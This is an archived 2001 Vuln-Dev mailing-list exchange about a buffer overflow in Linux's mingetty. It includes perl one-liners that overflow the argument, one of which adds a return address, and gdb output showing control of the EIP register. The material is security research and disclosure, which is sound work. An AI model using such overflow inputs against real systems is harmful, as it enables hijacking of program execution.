Vulnerability Development mailing list archives

Re: core dump on mingetty and getty


From: "G . Cohen" <sor () rshell org>
Date: Tue, 4 Dec 2001 01:31:02 +0200

On Mon, Dec 03, 2001 at 05:43:22PM -0200, Nelson Sampaio Araujo Junior wrote:
I've detected it under Mandrake 8.1.

Thus, this attack was not able to corrupt the EIP register, which is a good
signal. It screws up the EAX and EDX registers.

Not true.
/sbin/mingetty `perl -e 'print "A" x 255, "\x94\x1c\x49\x80"'`
#0  0x80491c94 in ?? ()
(gdb) info registers eip
     eip: 0x80491c94 -2142692204


Regards,
Nelson Junior
nelson () lunenetworks com br
nelson () LUNE com br

----- Original Message -----
From: "Ryan Yagatich" <ryany () procyon pantek com>
Cc: <vuln-dev () security-focus com>
Sent: Monday, December 03, 2001 5:21 PM
Subject: Re: core dump on mingetty and getty


$ cd ~
$ /sbin/mingetty `perl -e 'print "A" x 275'`
$ /sbin/mingetty `perl -e 'print "A" x 276'`
Segmentation fault
$ uname -a
Linux frodo.devel.lab 2.4.7-10 #1 ...
